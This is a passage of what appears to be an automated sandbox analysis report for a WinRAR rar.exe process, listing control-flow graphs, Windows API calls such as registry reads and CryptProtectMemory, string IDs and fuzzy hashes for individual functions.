                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: wcschr
                                                                                                                                                                                                                                                • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                                                                                                                                                                                                                • API String ID: 1497570035-1281034975
                                                                                                                                                                                                                                                • Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                                                • Instruction ID: 344b4bef9c7040a125b2bcb6bf4902794f15f9de1c5d4b547e6b3a8b5eec1698
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70C1C725A1CAA2D0EA37AF35D9711FC1351EF66784F644831F94ECA6DAEE2EE504C301

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1564 7ff60e607f24-7ff60e607f5c 1565 7ff60e607fd0 1564->1565 1566 7ff60e607f5e-7ff60e607f64 1564->1566 1567 7ff60e607fd7-7ff60e607fea 1565->1567 1566->1565 1568 7ff60e607f66-7ff60e607f7c call 7ff60e60b3f0 1566->1568 1570 7ff60e607fec-7ff60e607fef 1567->1570 1571 7ff60e608036-7ff60e608039 1567->1571 1576 7ff60e607fb5 1568->1576 1577 7ff60e607f7e-7ff60e607fb3 GetProcAddressForCaller GetProcAddress 1568->1577 1573 7ff60e60805c-7ff60e608065 GetCurrentProcessId 1570->1573 1575 7ff60e607ff1-7ff60e608000 1570->1575 1571->1573 1574 7ff60e60803b-7ff60e60804a 1571->1574 1578 7ff60e608077-7ff60e608093 1573->1578 1579 7ff60e608067 1573->1579 1584 7ff60e60804f-7ff60e608051 1574->1584 1585 7ff60e608005-7ff60e608007 1575->1585 1580 7ff60e607fbc-7ff60e607fce 1576->1580 1577->1580 1583 7ff60e608069-7ff60e608075 1579->1583 1580->1567 1583->1578 1583->1583 1584->1578 1586 7ff60e608053-7ff60e60805a 1584->1586 1585->1578 1587 7ff60e608009 1585->1587 1588 7ff60e608010-7ff60e608034 call 7ff60e5dca6c call 7ff60e5dcda4 call 7ff60e5dca40 1586->1588 1587->1588 1588->1578
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                                                                                                                                                                                                                • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                                                                • API String ID: 1389829785-2207617598
                                                                                                                                                                                                                                                • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                                                • Instruction ID: d0e42c71e80d6d68798fa4eb15afa69984c2b39f528421810cddb753584e435e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F741AE21A2DBB391FA45DB22B80057A6761BF65BD4F281131FC2E877A5DE7CF446A300

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 552178382-0
                                                                                                                                                                                                                                                • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                                • Instruction ID: bc70ff2853fa35d999b39028133bdb6126dad851bf35856997f8946f0dcb8285
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF317211E2C6A3C1FA56ABA4F5563B91391AF75784F6840B8FA0DC72D3DE2CE804A341

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF60E60495D,?,?,?,00007FF60E5F7E7D), ref: 00007FF60E6047DB
                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF60E60495D,?,?,?,00007FF60E5F7E7D), ref: 00007FF60E604831
                                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF60E60495D,?,?,?,00007FF60E5F7E7D), ref: 00007FF60E604853
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF60E60495D,?,?,?,00007FF60E5F7E7D), ref: 00007FF60E6048A6
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                                                                                                                                                                • String ID: LanguageFolder$Software\WinRAR\General
                                                                                                                                                                                                                                                • API String ID: 1800380464-3408810217
                                                                                                                                                                                                                                                • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                                                • Instruction ID: 9c2b1644c519e111a192dece6bb6653edc2ffd4a43d4b6ab521aa1c0eb0aad76
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE31A122738AA281EB60DB61F8542BA6351FF947A4F504231FE5D87BD9EF6CD148D700

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF60E5F38CB,?,?,?,00007FF60E5F41EC), ref: 00007FF60E5F43D1
                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF60E5F38CB,?,?,?,00007FF60E5F41EC), ref: 00007FF60E5F4402
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF60E5F38CB,?,?,?,00007FF60E5F41EC), ref: 00007FF60E5F440D
                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF60E5F38CB,?,?,?,00007FF60E5F41EC), ref: 00007FF60E5F443E
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseFileModuleNameOpenQueryValue
                                                                                                                                                                                                                                                • String ID: AppData$Software\WinRAR\Paths
                                                                                                                                                                                                                                                • API String ID: 3617018055-3415417297
                                                                                                                                                                                                                                                • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                                                • Instruction ID: 8720db6e8526e7db0e855b592ae89f1c119c6eb63027404ad7f4b8b38c3570a6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70119D32A28B5282EB619F22F4105AA7361FF98BC4F541531FA5E87B56EF3DD044D700

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1715 7ff60e5c7a5b-7ff60e5c7a5e 1716 7ff60e5c7a60-7ff60e5c7a66 1715->1716 1717 7ff60e5c7a68 1715->1717 1716->1717 1718 7ff60e5c7a6b-7ff60e5c7a7c 1716->1718 1717->1718 1719 7ff60e5c7a7e-7ff60e5c7a81 1718->1719 1720 7ff60e5c7aa8 1718->1720 1721 7ff60e5c7a83-7ff60e5c7a86 1719->1721 1722 7ff60e5c7a88-7ff60e5c7a8b 1719->1722 1723 7ff60e5c7aab-7ff60e5c7ab8 1720->1723 1721->1720 1721->1722 1724 7ff60e5c7aa4-7ff60e5c7aa6 1722->1724 1725 7ff60e5c7a8d-7ff60e5c7a90 1722->1725 1726 7ff60e5c7ac8-7ff60e5c7acb 1723->1726 1727 7ff60e5c7aba-7ff60e5c7abd 1723->1727 1724->1723 1725->1720 1729 7ff60e5c7a92-7ff60e5c7a99 1725->1729 1728 7ff60e5c7acf-7ff60e5c7ad1 1726->1728 1727->1726 1730 7ff60e5c7abf-7ff60e5c7ac6 1727->1730 1731 7ff60e5c7ad3-7ff60e5c7ae6 1728->1731 1732 7ff60e5c7b2a-7ff60e5c7bb0 call 7ff60e5e1d34 call 7ff60e5c3f04 1728->1732 1729->1724 1733 7ff60e5c7a9b-7ff60e5c7aa2 1729->1733 1730->1728 1734 7ff60e5c7ae8-7ff60e5c7af2 call 7ff60e5d9be0 1731->1734 1735 7ff60e5c7b0a-7ff60e5c7b27 1731->1735 1744 7ff60e5c7bb2-7ff60e5c7bba 1732->1744 1745 7ff60e5c7bbc 1732->1745 1733->1720 1733->1724 1739 7ff60e5c7af7-7ff60e5c7b02 1734->1739 1735->1732 1739->1735 1744->1745 1746 7ff60e5c7bbf-7ff60e5c7bc9 1744->1746 1745->1746 1747 7ff60e5c7bcb-7ff60e5c7bd5 call 7ff60e5e1e1c 1746->1747 1748 7ff60e5c7bda-7ff60e5c7c06 call 7ff60e5cb540 1746->1748 1747->1748 1752 7ff60e5c7c40 1748->1752 1753 7ff60e5c7c08-7ff60e5c7c0f 1748->1753 1755 7ff60e5c7c44-7ff60e5c7c5a call 7ff60e5caa68 1752->1755 1753->1752 1754 7ff60e5c7c11-7ff60e5c7c14 1753->1754 1754->1752 1756 7ff60e5c7c16-7ff60e5c7c2b 1754->1756 1760 7ff60e5c7c85-7ff60e5c7c97 call 7ff60e5cb540 1755->1760 1761 7ff60e5c7c5c-7ff60e5c7c6a 1755->1761 1756->1755 1758 7ff60e5c7c2d-7ff60e5c7c3e call 7ff60e619b98 1756->1758 1758->1755 1767 7ff60e5c7c9c-7ff60e5c7c9f 1760->1767 1761->1760 1763 7ff60e5c7c6c-7ff60e5c7c7e call 7ff60e5c8d98 1761->1763 1763->1760 1769 7ff60e5c7ca5-7ff60e5c7cfb call 7ff60e5f9354 call 7ff60e5e6378 * 2 1767->1769 1770 7ff60e5c7fa4-7ff60e5c7fbe 1767->1770 1777 7ff60e5c7d17-7ff60e5c7d1f 1769->1777 1778 7ff60e5c7cfd-7ff60e5c7d10 call 7ff60e5c5414 1769->1778 1779 7ff60e5c7d25-7ff60e5c7d28 1777->1779 1780 7ff60e5c7de2-7ff60e5c7de6 1777->1780 1778->1777 1779->1780 1785 7ff60e5c7d2e-7ff60e5c7d36 1779->1785 1782 7ff60e5c7e4e-7ff60e5c7e68 call 7ff60e5f9958 1780->1782 1783 7ff60e5c7de8-7ff60e5c7e49 call 7ff60e5f98dc 1780->1783 1793 7ff60e5c7e8b-7ff60e5c7e8e 1782->1793 1794 7ff60e5c7e6a-7ff60e5c7e84 1782->1794 1783->1782 1788 7ff60e5c7d59-7ff60e5c7d6a call 7ff60e61a444 1785->1788 1789 7ff60e5c7d38-7ff60e5c7d49 call 7ff60e61a444 1785->1789 1801 7ff60e5c7d78-7ff60e5c7dc6 1788->1801 1802 7ff60e5c7d6c-7ff60e5c7d77 call 7ff60e5ecf8c 1788->1802 1799 7ff60e5c7d57 1789->1799 1800 7ff60e5c7d4b-7ff60e5c7d56 call 7ff60e5e8ae8 1789->1800 1797 7ff60e5c7e90-7ff60e5c7e9a call 7ff60e5f9990 1793->1797 1798 7ff60e5c7e9f-7ff60e5c7eb8 call 7ff60e5c1204 1793->1798 1794->1793 1797->1798 1813 7ff60e5c7ec8-7ff60e5c7ed9 call 7ff60e5f941c 1798->1813 1799->1801 1800->1799 1801->1780 1823 7ff60e5c7dc8-7ff60e5c7de1 call 7ff60e5c1314 call 7ff60e61ba34 1801->1823 1802->1801 1817 7ff60e5c7edb-7ff60e5c7f9f call 7ff60e5c1400 call 7ff60e5e6424 call 7ff60e5cb540 1813->1817 1818 7ff60e5c7eba-7ff60e5c7ec3 call 7ff60e5f9680 1813->1818 1817->1770 1818->1813 1823->1780
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: H9
                                                                                                                                                                                                                                                • API String ID: 0-2207570329
                                                                                                                                                                                                                                                • Opcode ID: dc8ac98f76198ceb84fbff606d01c81e4b442a240a692ad2837d24375af1e692
                                                                                                                                                                                                                                                • Instruction ID: 2caa61e928e47ce3511e550a7b6e0e4aabc974c867990f8dfcc2faab02309046
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc8ac98f76198ceb84fbff606d01c81e4b442a240a692ad2837d24375af1e692
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70E1E562B08AA289EB16CB25E4647FD23A5FB6874CF654C32EE4D83785DF3AD544C700

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1858 7ff60e5e2574-7ff60e5e259c 1859 7ff60e5e25a5-7ff60e5e25a9 1858->1859 1860 7ff60e5e259e-7ff60e5e25a0 1858->1860 1862 7ff60e5e25ab-7ff60e5e25b6 GetStdHandle 1859->1862 1863 7ff60e5e25ba-7ff60e5e25c6 1859->1863 1861 7ff60e5e273a-7ff60e5e2756 1860->1861 1862->1863 1864 7ff60e5e2619-7ff60e5e2637 WriteFile 1863->1864 1865 7ff60e5e25c8-7ff60e5e25cd 1863->1865 1868 7ff60e5e263b-7ff60e5e263e 1864->1868 1866 7ff60e5e2644-7ff60e5e2648 1865->1866 1867 7ff60e5e25cf-7ff60e5e2609 WriteFile 1865->1867 1870 7ff60e5e2733-7ff60e5e2737 1866->1870 1871 7ff60e5e264e-7ff60e5e2652 1866->1871 1867->1866 1869 7ff60e5e260b-7ff60e5e2615 1867->1869 1868->1866 1868->1870 1869->1867 1872 7ff60e5e2617 1869->1872 1870->1861 1871->1870 1873 7ff60e5e2658-7ff60e5e2692 GetLastError call 7ff60e5e3144 SetLastError 1871->1873 1872->1868 1878 7ff60e5e2694-7ff60e5e26a2 1873->1878 1879 7ff60e5e26bc-7ff60e5e26d0 call 7ff60e5dc95c 1873->1879 1878->1879 1880 7ff60e5e26a4-7ff60e5e26ab 1878->1880 1885 7ff60e5e26d2-7ff60e5e26db 1879->1885 1886 7ff60e5e2721-7ff60e5e272e call 7ff60e5dcf14 1879->1886 1880->1879 1882 7ff60e5e26ad-7ff60e5e26b7 call 7ff60e5dcf34 1880->1882 1882->1879 1885->1863 1888 7ff60e5e26e1-7ff60e5e26e3 1885->1888 1886->1870 1888->1863 1889 7ff60e5e26e9-7ff60e5e271c 1888->1889 1889->1863
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite$Handle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3350704910-0
                                                                                                                                                                                                                                                • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                                • Instruction ID: 2bcdc281c7aff1513ae979b2a3346a584c2c3e40c60b1d047826e460cd750814
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A051E726B18A6283EA69DF21F52437A73A0FB64B40F240535FE4E87BA4DF3DE045C600

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
